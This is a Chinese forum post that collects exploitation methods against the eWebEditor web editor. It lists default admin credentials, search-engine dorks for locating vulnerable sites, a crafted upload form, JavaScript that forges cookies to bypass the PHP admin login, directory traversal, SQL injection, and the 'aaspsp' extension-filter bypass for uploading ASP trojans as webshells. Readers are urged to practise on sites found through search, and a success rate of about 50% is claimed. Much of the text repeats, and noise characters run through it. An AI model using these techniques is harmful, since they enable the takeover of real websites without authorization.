eWebEditor.asp?id=45&style=standard1 样式调用
$ [% V7 e4 s& Y; Q& A% V/ p1 U6 |& j9 j l
' Q, D- T* d5 P/edit/admin_uploadfile.asp?id=14&dir=../../..
+ `% o* m% J1 e8 ?2 z) Z可以浏览网站目录 ../自己加或者减* J) i5 q. I+ c
& c" j- b5 Q# `5 |( R有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞8 x8 U1 q# x( x n4 X6 V
简单利用就是6 @8 a2 k% K4 I" w
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
$ e F' }9 T$ |9 Nhttp://www.siqinci.com/ewebedito ... amp;style=full_v200
" x) z y6 n. [, n可以利用nbsi进行猜解,对此进行注入
: f$ M. I$ \( t还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
& V8 {8 n, y9 J3 N这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:5 [1 k# b6 O' } X n" C; t! o) w
在action下面
+ ?9 Z' G. O$ w2 u8 ]9 d! |<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">& k6 _: S2 b. l" ]: M- ~+ ]
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
+ X$ T# M' v% R( P/ W<input type="submit" name="uploadfile" value="提交">2 q7 ^' u* q3 m1 e) l
<input type=hidden name=originalfile value="">
6 f2 f( ?8 `5 n, q</form>8 g7 o0 v0 ?/ B. N
------------------------------------------------------------------------------------------------------------------------------------------------4 L+ }# l/ g1 }+ r. g; ]5 u
<input type="submit" name="uploadfile" value="提交"> 放在action后头 ^7 L; J$ O+ D: H$ e' c
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
- q5 `, P: u) A7 v( U. P" ~ Z" M! H% [0 z1 M
: `+ V* f$ g* ~6 Z. |7 {0 A, f: d+ W8 g; q- E
6 A$ K9 X5 p$ `& s4 `( rEwebeditor最新漏洞及漏洞大全[收集] (图)
4 }: {" X% S* n: P$ {5 T7 J本帖最后由 administrator 于 2009-7-7 21:24 编辑- C% a( ]6 c4 L3 g) u2 |
' r% C! g4 u1 ~* f- B5 n
以下文章收集转载于网络0 A3 O6 _' M. v& G9 X
#主题描述# ewebeditor 3.8漏洞[php] N5 k: C7 _# p& g T
--------------------------------------------------------------------------------------------$ W! _1 i& i0 s! U6 I7 N& [) J
#内容#
4 m3 {$ \2 \: Sphp版ewebeditor 3.8的漏洞
! I" s8 p) d6 Vphp版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
+ A3 F* k8 S( E3 I5 F1 r1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,% I2 [% j# X1 G1 t
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了; I3 R6 R7 }% r" {
3 后面的利用和asp一样,新增样式修改上传,就ok了
2 I4 w- O* |$ j8 r: v; j测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
+ B5 J8 u7 U0 saspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell ], s% ^" B& C6 F* u
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了2 X# m4 z* S" u' i
--------------------------------------------------------------------------------------------+ q. k+ R9 a: @
8 J/ b' z& c+ R0 X/ ^/ o5 R* l
- a- I3 P H, d% ]0 B算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
. N. A! l. F. [' \
, O8 ~1 J1 v; B& h漏洞更新日期TM: 2009 2 9日 转自zake’S Blog% X, n9 ^2 _: ?# i* g E5 V
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
! X; |6 g- J- V9 A ]% O那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址. d5 {# t4 o8 R' w
* p" o6 ?3 A/ ~: `& u
' @; R! y9 ]0 I2 ?2 @" s! ]9 s5 j然后确定以后,这里是最关键的一部!
; F. c9 f' U3 ?这里点了远程上传以后,再提交得到木马地址
! t: x& a' x& |7 e7 S+ v由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限 @& e; D! K0 L
属于安全检测漏洞版本ewebeditor v6.0.03 v/ F) O9 j/ C" S
( A# W5 t% T; Q P+ V6 A以前的ewebeditor漏洞:
A, w. s% Y4 f$ K* `, O' z* r) d9 `9 N p
ewebeditor注入漏洞7 y, t6 x, j' z* y: _
6 g: _- J; Y7 }! j$ _6 x大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb+ j v O, L) T/ H* B
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
& \% s" `# S5 T1 M& M# D8 }今天我给大家带来的也是ewebeditor编辑器的入侵方法
; @: } p' t1 a1 ^( O7 H不过一种是注入,一种是利用upload.asp文件,本地构造
( D( d. d L8 Q- f4 j" WNO1:注入
$ B* l7 U# v& @" o) Khttp://www.XXX.com/ewebeditor200 ... amp;style=full_v200
( I' {, d/ p2 g6 b8 U. j编辑器ewebedior7以前版本通通存在注入
7 u( X6 ~( t5 z1 W直接检测不行的,要写入特征字符
7 h5 a( E# |9 x8 P' R. L- f2 U1 }我们的工具是不知道ewebeditor的表名的还有列名
) }) B, B) P1 A7 O3 f我们自己去看看% d, P9 Z1 S8 h- ]; j0 A
哎。。先表吧: ~( m! A. p. }1 \, C
要先添加进库
5 j* ?+ o1 ^$ r6 Q开始猜账号密码了' v8 r1 ~' V- @5 q+ q" E5 e
我们==( Z# ]3 S/ q" ?; \5 z2 z3 U, |
心急的往后拉/ N' r" Q* @5 y
出来了$ T) I8 O$ C* Q
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120 {. u C) H* Z" s, H/ o
对吧^_^/ ~8 A6 F. _0 O7 t2 H* X
后面不说了$ J4 x" W6 Z: w, H
NO2:利用upload.asp文件,本地构造上传shell) c: N9 W' l- F/ t& E E
大家看这里- D) W2 Q! G$ ?
http://www.siqinci.com/ewebedito ... lepreview&id=378 k3 k4 q+ ?# s
如果遇见这样的情况又无法添加工具栏是不是很郁闷; i+ X6 }0 B! j
现在不郁闷了,^_^源源不一般4 {6 j7 h3 [& f
我们记录下他的样式名“aaa”1 z' c7 D% \, d3 E% R2 {% p
我已经吧upload.asp文件拿出来了
0 b- i2 Y4 D( i我们构造下
% @4 I: P& H5 P7 H! |% M eOK,我之前已经构造好了2 l9 w1 h3 n T& |
其实就是这里
# M0 \- ~& |% S$ K6 t<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>8 n; P0 k2 J: H. z2 L2 k
<input type=file name=uploadfile size=1 style=”width:100%”>
. O, |0 ~4 E$ W$ L( X, u<input type=submit value=”上传了”></input>8 b' U! b: B, {6 r
</form>
1 f: z0 z0 f$ W( e' l下面我们运行他上传个大马算了
/ J; f% Y7 s! s- @3 ?* h! `UploadFile上传进去的在这个目录下$ w% j4 q! R' n8 ^5 h
2008102018020762.asa
4 z* n5 R9 a( p6 E) t4 L* g' @5 {# y$ D+ ]
过往漏洞:* W$ F) E6 E7 Y/ X
2 \1 r% A, p8 w6 h, a0 d6 j首先介绍编辑器的一些默认特征:9 s6 T4 B$ a; W7 G' K- z
默认登陆admin_login.asp
; A1 w# `, C5 ~" H. J默认数据库db/ewebeditor.mdb
0 l: \* y* A1 `( N$ a默认帐号admin 密码admin或admin888' O; b) p3 U+ Z8 q
搜索关键字:”inurl:ewebeditor” 关键字十分重要) M7 L7 q& U* C" m) [! r
有人搜索”eWebEditor - eWebSoft在线编辑器”
6 v, m- P" g( Q# d0 {根本搜索不到几个~3 s0 G3 j C% K+ a9 ^
baidu.google搜索inurl:ewebeditor o+ ^+ U6 B; V/ P$ d+ ^
几万的站起码有几千个是具有默认特征的~) d& H, \9 B% P6 _
那么试一下默认后台
% n; J- e( [8 {4 h, w: dhttp://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
2 m$ V3 ^( D$ z# D j试默认帐号密码登陆。
c& ?: G' A" i6 c+ U利用eWebEditor获得WebShell的步骤大致如下:
" _9 k* R p4 P% a! d1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
" B* {2 Q2 ^. W- H2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
+ I2 q# O/ r$ G; J! x7 _- @3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
' s0 d+ z# B7 M; B8 P# w: ?如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!6 m1 v. q$ [7 ? @8 g) O
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
0 F- p8 E) Q& q: l5 Z然后在上传的文件类型中增加“asa”类型。4 C7 B3 U: l6 j3 M2 ?7 {
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。/ y2 n. u) W) |( ~# C4 p! y# P+ [
漏洞原理
' {3 u" R- S8 `( {$ K' w2 R/ y" e漏洞的利用原理很简单,请看Upload.asp文件:
, S2 u9 S5 p0 _& J0 P- y7 |任何情况下都不允许上传asp脚本文件+ c/ m! Z& O+ L' w
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)6 `" Z* x( W2 f- W5 H% r
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
. x6 w& l7 X. z$ i6 D+ |. \高级应用: T. d& U8 C, y
eWebEditor的漏洞利用还有一些技巧:
8 j2 Z1 j% c: F% K: x: M2 U1.使用默认用户名和密码无法登录。2 P% y% n8 i( D, y
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
! R: a8 |! J' U8 `4 E [2.加了asa类型后发现还是无法上传。
& Q& m) k7 `1 y7 |; r' F. | s' l应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:
) \3 q5 ^; Q9 S( i- dsAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)0 G6 x& _5 B" Z2 m$ e
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。* U Q$ ]7 ?0 y/ z9 ~! F9 t' }$ P
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
4 l4 K: Z% A" L: J8 A1 \呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
* g* `) U3 b* h/ W1 s) f. g+ Y4.已经使用了第2点中的方法,但是asp类型还是无法上传。
) Q: k c2 ^- M# w- _4 b看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。* ~6 `0 x$ h( x, v
后记
5 h5 Q% D# M& N5 ~5 l根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
6 B$ ^7 ?6 b, G4 R基本入侵基础漏洞
4 ~9 ~$ @& c1 ?7 NeWebEditor 漏洞
9 D6 k& c/ v! K- C1 X) C8 q
5 I9 M* v; @2 N! |% y/ U2 H1 F各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! ! b3 v: b6 k* `$ U( V
3 n' r' O6 P" X! I漏洞利用% x* N6 l* I B) e2 y
利用eWebEditor获得WebShell的步骤大致如下:
& ?" H% a3 {. z& T% N; a4 h1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
% m; c& s/ d4 H2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。
8 d9 [, E5 }# [/ l, I) D/ }; x( i3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
& `! d+ ^) \( [: R& y如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
6 C5 O2 X% P8 e, V4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。# T6 q1 Y m0 l! \0 [
) J/ j" c+ K B, B然后在上传的文件类型中增加“asa”类型。
- O% W. v' i0 k, W; ]6 ?
3 ?/ o8 j5 m. R- K4 K" \- X5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。8 n! j! \7 j2 ?0 h6 t
: f* ?9 F& T) T2 N
2 x+ F0 q0 R. d: Z. m
漏洞原理
4 S% `3 S7 f7 N& U. d* W! d漏洞的利用原理很简单,请看Upload.asp文件:$ q; E! X U+ y% f* f p
任何情况下都不允许上传asp脚本文件
& r+ `4 k$ T7 ]- }: X* }sAllowExt = replace(UCase(sAllowExt), "ASP", "")! w9 l3 s+ ], j! ]3 Q& P
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!) X3 n0 E; q: m0 L9 X* S9 S
; v' ]4 L# A0 a5 ~, r2 @
高级应用
6 O9 S+ |7 x5 ~6 p- \8 FeWebEditor的漏洞利用还有一些技巧:
$ j1 D" P3 r4 w! D1.使用默认用户名和密码无法登录。% t1 ^1 g% w" r$ E% K6 O F- H& e
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。4 x+ P$ [/ o* H* j: B1 o% W V
2.加了asa类型后发现还是无法上传。
$ r/ f% @0 R1 g! g3 q+ Z# h应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:' Q' ~" ?7 u- t+ `( x6 s9 e [; i+ t2 }
sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
: |, T- _5 L; Y: v9 b" j7 f猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
: h' K1 G5 {' N' }3 u3.上传了asp文件后,却发现该目录没有运行脚本的权限。
. F- S& M, A* G q! h呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。3 Y3 z6 \. @1 X
4.已经使用了第2点中的方法,但是asp类型还是无法上传。( u$ @6 S( i- A1 J, Y, |
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。1 |# N2 K, @# _8 j! E' A* y3 }
/ Z! I9 r# |4 z" u) t$ H
后记
4 |' M7 e9 g( H5 D8 k; n3 _! x根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |
发表于 2012-9-13 17:00:58
收藏
支持
反对